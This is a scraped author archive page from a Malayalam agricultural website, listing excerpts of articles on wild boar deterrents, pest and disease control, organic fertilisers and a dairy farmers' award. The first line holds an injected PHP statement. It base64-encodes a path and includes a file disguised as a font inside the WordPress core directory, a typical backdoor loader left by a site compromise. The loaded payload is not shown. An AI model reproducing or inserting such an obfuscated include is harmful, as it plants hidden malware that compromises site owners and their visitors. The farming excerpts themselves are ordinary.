@include base64_decode("L2hvbWUvaHl6dmh2cGcvaG9ydGljb3BzLmNvbS93cC1pbmNsdWRlcy9UZXh0L0RpZmYvRW5naW5lL2Rhc2hpY29ucy50dGY="); VISHNUPRIYA A, Author at HORTICOPS

VISHNUPRIYA A

പന്നിയെ തുരത്താനുള്ള കുറച്ചു നാടൻ മാർഗങ്ങൾ

1.. ബാർബർ ഷോപ്പുകളിൽ നിന്ന് ശേഖരിക്കുന്ന വെയ്സ്റ്റ് മുടി കൃഷിയിടങ്ങളിൽ പല സ്ഥലങ്ങളിലായി വിതറി ഇടുക. എല്ലാ തൈകളുടേയും ചുവട്ടിൽ ഇടണമെന്നില്ല. അതിരുകളിലും അവിടേയും ഇവിടേയും ആയി ഈ മുടി വിതറി ഇടുക. നമ്മുടെ മുടിക്കും മനുഷ്യന്റെ ഗന്ധം ഉണ്ട്. കാട്ടുപന്നി വളരെയധികം ഘ്രാണശക്തിയുള്ള മൃഗമായത് മൂലം ഈ മണം അവ പിടിച്ചെടുക്കുകയും മനുഷ്യൻ അവിടെ ഉണ്ട് എന്ന് തെറ്റിദ്ധരിച്ച് കൃഷിയിടത്തിൽ കയറാതെ , അഥവാ കയറി പോയാലും മുന്നും പിന്നും നോക്കാതെ ഓടി രക്ഷപ്പെടുകയും ചെയ്യും….

Read More

ചാഴി നിയന്ത്രണവും പ്രതിരോധവും – പച്ചക്കറികളെ ആക്രമിക്കുന്ന കീടങ്ങള്‍

പച്ചക്കറികളെയും നെല്ലിനെയും ആക്രമിക്കുന്ന ഒരു ഷഡ്പദമാണ് ചാഴി. നീരും പാലും ഊറ്റിക്കുടിച്ച്‌ ധാന്യവിളവ്‌ നശിപ്പിക്കുകയാണ് ചെയ്യുന്നത്. പച്ചക്കറികളില്‍ , പയർ വർഗ്ഗങ്ങളിലാണ് ഇവയുടെ ആക്രമണം കൂടുതലായി കണ്ടുവരുന്നത്. നെല്‍കൃഷിയില്‍ ഇവയുടെ ആക്രമണം വലിയ നഷ്ട്ടം ആണുണ്ടാക്കുന്നത്. കതിർകുല പുറത്തുവന്ന് പാൽ നിറഞ്ഞിരിക്കുന്ന സമയത്താണ് ഇവയുടെ ആക്രമണം . ഈ പ്രാണികള്‍ നെന്മണികൾ തുളച്ച് ഉള്ളിലെ പാൽ വലിച്ചുകുടിച്ച് മണികൾ പതിരാക്കി മാറ്റുന്നു. നിയന്ത്രണ മാര്‍ഗങ്ങള്‍1, മത്തിയും ശർക്കരയും ചേർത്തുള്ള മിശ്രിതം തളിച്ച് ഇവയെ നിയന്ത്രിക്കാം. മത്തിയും ശര്‍ക്കരയും…

Read More

സി-പോം – 100 % പ്രകൃതിദത്തമായ ജൈവവളം..ഉപയോഗക്രമവും സവിശേഷതകളും

വിഘടിക്കാതെ മണ്ണില്‍ കുമിഞ്ഞു കൂടി പരിസ്ഥിതി മലിനീകരണത്തിന് കാരണമാകുന്ന ചകിരിച്ചോര്‍ പിത്ത് പ്ലസ്‌ എന്ന സൂഷ്മാണു മിശ്രിതത്തെ ഉപയോഗിച്ച് കമ്പോസ്റ്റിംഗ് പ്രക്രിയയിലൂടെ എല്ലാ വിധ കാര്‍ഷിക വിളകള്‍ക്കും ഉപയോഗിക്കാവുന്ന ജൈവവളം ആക്കുന്നു. സവിശേഷതകൾ മണ്ണില്‍ വായു സഞ്ചാരം വര്‍ദ്ധിപ്പിച്ചു സസ്യ വളര്‍ച്ചയെ ത്വരിതപ്പെടുത്തുന്നു. ചെടിയുടെ വളര്‍ച്ചയ്ക്ക് അത്യന്താപേക്ഷിതമായ മൂലകങ്ങളായ നൈട്രജന്‍ , ഫോസ്ഫറസ് , പൊട്ടാസ്യം (എന്‍ പി കെ) ഗണ്യമായ രീതിയില്‍ പ്രധാനം ചെയുന്നതോടൊപ്പം സൂഷ്മ മൂലകങ്ങളായ Ca, Mg, Fe, Mn, Zn എന്നിവയുടെ…

Read More

നെല്ലിന്റെ ബ്ലാസ്റ്റ് രോഗം

അതിവേഗം പടർന്ന് പുൽവർഗ ചെടികളെ നാമാവശേഷമാക്കാൽ കഴിവുള്ള ഒരു ഫംഗസ് രോഗമാണ് ബ്ലാസ്റ്റ്. ഇത് കൂടുതലും ബാധിക്കുന്നത് നെൽക്കൃഷിയെ ആണ്. നെൽച്ചെടിയുടെ എല്ലാ ദശകളിലും ഇത് ബാധിച്ചേക്കാം. പാടം മുഴുവനും തീ വിതറിയതുപോലെ ചെടികൾ മൊത്തം ഇലയും തണ്ടും കതിരും കരിഞ്ഞ് നശിച്ചു പോകുന്നു. കതിർക്കുലകൾ വന്ന സമയമാണെങ്കിൽ കതിർക്കുലകളടക്കം കരിഞ്ഞ് വിഴുന്നു. ലക്ഷണം ഇത്തരം ഫംഗസ് ചെടികളിൽ വന്നുപെട്ടാൽപ്പിന്നെ ആദ്യതന്നെ ഇലകളിൽ ചെറിയ തീപ്പൊള്ളലേറ്റ കുത്തുകൾപോലെയാണ് കാണപ്പെടുക. ചുവന്നപാടുകളും കാണും ഈ പാടുകൾ പെട്ടെന്നുതന്നെ വളരുകയും…

Read More

മുരിങ്ങയില സത്തിന്റെ ഉപയോഗം

മുരിങ്ങയുടെ 40 ദിവസത്തോളം മൂപ്പുള്ള ഇളംഇലകള്‍ കുറച്ചു വെള്ളം ചേര്‍ത്ത് മിക്സിയിലടിക്കുന്നു. തുടര്‍ന്ന് തുണിയില്‍ കിഴികെട്ടി സത്തും ചണ്ടിയും വേര്‍തിരിക്കും. മുരിങ്ങയിലസത്ത് വളര്‍ച്ചാ ഹോര്‍മോണായി വിളകളില്‍ ഉപയോഗപ്പെടുത്താം. മുരിങ്ങയിലയില്‍ ‘സൈറ്റോകൈനുകള്‍’ എന്ന ഹോര്‍മോണുകള്‍ നല്ല തോതിലുണ്ട്. ‘സിയാറ്റിന്‍’ ചെടികളുടെ വളര്‍ച്ച ത്വരിതപ്പെടുത്തുന്ന ഹോര്‍മോണുകളാണ് ഇവ.സത്ത് 32 ഇരട്ടി വെള്ളത്തില്‍ നേര്‍പ്പിക്കുകയും സ്പ്രെയറില്‍ നിറച്ച് തളിക്കുകയും ചെയ്യുന്നു. വിളകളുടെ ഇലകളിലാണ് ഇത് തളിക്കുക. പച്ചക്കറിയുള്‍പ്പെടെ പല വിളകളിലും മുരിങ്ങയില സത്ത് തളിക്കുന്നുണ്ട്. വിത്ത് മുളച്ച് 10 ദിവസം കഴിഞ്ഞും…

Read More

ചാരത്തിന്റെ ഉപയോഗം

ആദ്യകാലം മുതല്‍ തന്നെ കൃഷിക്ക് ഉപയോഗിക്കുന്ന പ്രധാന വളമാണ് ചാരം. വീടുകളിലെ അടുപ്പില്‍ വിറക് കത്തിക്കുമ്പോള്‍ ലഭിക്കുന്ന ചാരം അക്കാലത്ത് അടുക്കളത്തോട്ടത്തില്‍ വളമായി ഉപയോഗിച്ചു. ചാരത്തിന്റെ ഗുണങ്ങള്‍ ജൈവവസ്തുക്കള്‍ കത്തിച്ചു കിട്ടുന്ന ചാരം നല്ലൊരു വളമാണ്. ചെടികളുടെ വളര്‍ച്ചയ്ക്ക് വേണ്ട പ്രാഥമിക മൂലകങ്ങളിലൊന്നാണ് ക്ഷാരം. ഇതു ചാരത്തില്‍ ധാരാളമായി അടങ്ങിയിരിക്കുന്നു. അടിസ്ഥാനവളമായിട്ടാണ് ചാരം ഉപയോഗിക്കുക. നടുന്നതിനും വിതയ്ക്കുന്നതിനും മുന്‍പ് അവസാനം മണ്ണ് ഇളക്കുന്നതിനൊപ്പം ചാരവും മണ്ണില്‍ ചേര്‍ക്കണാം. തടമെടുത്തു നടുമ്പോള്‍ തടത്തിനുള്ളിലും അല്ലാതെ വിത നടത്തി കൃഷിയിറക്കുമ്പോള്‍…

Read More

എങ്ങനെ ജൈവ റൌണ്ട് അപ്പ് നിർമിക്കാം

പുല്ലുകളും കളകളും അനാവശ്യമായി നശിപ്പിച്ചു കളയരുത്. അത് ഭൂമിയെ അല്ലെങ്കില്‍ മണ്ണിനെ സംരക്ഷിക്കുന്ന ഒരു ആവരണം ആയി പ്രവർത്തിക്കുന്നവയാണ് .25 കിലോ കളകൾ ശേഖരിക്കുക അതിനു ശേഷം അതിനെ കൊത്തി നുറുക്കി അരിയുക. ശേഷം അതിനെ 100 litter അളവ് കൊള്ളുന്ന ഒരു ചെറിയ drum ഇല്‍ ഇട്ടു വെക്കുക. അതിലേക്ക് 250 ഗ്രാം ഉപ്പ്, ചാണകം, ശര്‍ക്കര എന്നിവ ഇടുക എന്നിട്ട് ആ drum വെള്ളം ഒഴിച്ച് നിറയ്ക്കുക. അതിനു ശേഷം തുടർച്ചയായി 25 ദിവസത്തേയ്ക്ക്…

Read More

പച്ചക്കറികളിലുണ്ടാകുന്ന ഉറുമ്പ് ശല്യത്തിന്

ചിലയിനം ഉറുമ്പുകള്‍ പച്ചക്കറിവിളകളില്‍ കേടുപാടുണ്ടാക്കാറുണ്ട്. എന്നാല്‍, മിശിറ് (നീറ്) പോലുള്ളവ കര്‍ഷകന് ഉപകാരികളാണ്.മിശിറുകള്‍ പച്ചക്കറികളിലെ കീടങ്ങളെയും അവയുടെ മുട്ടകളെയും കൊന്നൊടുക്കുമെന്നതിനാല്‍ ഈ ഉറുമ്പുകളെ ശല്യപ്പെടുത്തരുത്. *ശല്യക്കാരായ ഉറുമ്പുകളെ അകറ്റാന്‍ പരിസ്ഥിതിസൗഹൃദപരമായ നിയന്ത്രണരീതി അനുവര്‍ത്തിക്കാംഒരു കിലോഗ്രാം ചാരത്തില്‍ കാല്‍ക്കിലോഗ്രാം വീതം കക്ക നീറ്റിയതും കല്ലുപ്പ് പൊടിച്ചതും ചേര്‍ത്ത് ഉറുമ്പിന്റെ സാന്നിധ്യമുള്ളയിടങ്ങളില്‍ വിതറുക. ഈ മിശ്രിതത്തിന്റെ ചൂടും നീറ്റലും ഉറുമ്പുകളെ തുരത്തും.സോപ്പുവെള്ളം സ്പ്രേ ചെയ്യുന്നതിലൂടെ ഉറുമ്പുകൾ പോകുകയും ചെയ്യും.മുളകു പൊടി, ഉപ്പ് എന്നിവ വിതറുന്നതും നല്ലതു തന്നെ. ഇവ വെള്ളത്തില്‍…

Read More

ക്ഷീരകര്‍ഷക അവാര്‍ഡുകള്‍ക്ക് അപേക്ഷിക്കം.

ക്ഷീരവികസന വകുപ്പിന്റെ സംസ്ഥാന ക്ഷീരകര്‍ഷക സംഗമം – ‘പടവ് 2024’ ഫെബ്രുവരി 16, 17 തീയതികളിലായി ഇടുക്കി ജില്ലയിലെ അണക്കരയില്‍ നടത്തും. 2022-2023 സാമ്പത്തിക വര്‍ഷത്തെ പ്രവര്‍ത്തനമികവിന്റെ പശ്ചാത്തലത്തില്‍ ക്ഷീരകര്‍ഷകര്‍ക്ക് സംസ്ഥാനം, മേഖല, ജില്ല അടിസ്ഥാനത്തില്‍ ജനറല്‍, വനിത, എസ് സി- എസ് റ്റി വിഭാഗത്തില്‍ ഉള്‍പ്പെട്ട ക്ഷീരകര്‍ഷകരെ തിരഞ്ഞെടുക്കുന്നതിനുള്ള ‘ക്ഷീരസഹകാരി’ അവാര്‍ഡിന് അപേക്ഷിക്കാം. തിരഞ്ഞെടുക്കപ്പെടുന്ന 52 ക്ഷീരകര്‍ഷകര്‍ക്ക് ബഹുമതി പത്രവും ക്യാഷ് അവാര്‍ഡും നല്‍കും.2022-23 സാമ്പത്തിക വര്‍ഷത്തെ പ്രവര്‍ത്തന മികവിന്റെ ഭാഗമായി കേരളത്തിലെ ഏറ്റവും മികച്ച…

Read More

സസ്യങ്ങളും രോഗങ്ങളും

സസ്യങ്ങളുടെ മോശം ആരോഗ്യത്തിന്റെ പ്രധാന കാരണങ്ങൾ പകർച്ചവ്യാധികളല്ല, പ്രതികൂല പാരിസ്ഥിതിക സാഹചര്യങ്ങളുടെ ഫലമാണ്. നൈട്രജൻ, ഫോസ്ഫറസ് അല്ലെങ്കിൽ ഇരുമ്പ് തുടങ്ങിയ മണ്ണിന്റെ ധാതുക്കളുടെ കുറഞ്ഞ സാന്ദ്രത സസ്യങ്ങളുടെ അസാധാരണ വളർച്ചയ്ക്ക് കാരണമാകും. അത്തരം പോഷകങ്ങളുടെ അഭാവത്തിന്റെ ലക്ഷണങ്ങളിൽ പലപ്പോഴും മഞ്ഞയോ അല്ലെങ്കിൽ അസാധാരണമായ രൂപത്തിലുള്ള ഇലകളും ചെടികളുടെ വളർച്ചയും ഉൾപ്പെടുന്നു. ചെടികളുടെ ആരോഗ്യം മോശമാകാനുള്ള മറ്റൊരു കാരണം അമിതമായ വെള്ളമാണ്, ഇത് മണ്ണിലെ ഓക്സിജന്റെ അളവ് കുറയുകയും വേരുകളുടെ വളർച്ച മോശമാവുകയും ചെയ്യുന്നു. മണ്ണിന്റെ അസിഡിറ്റി വളരെ…

Read More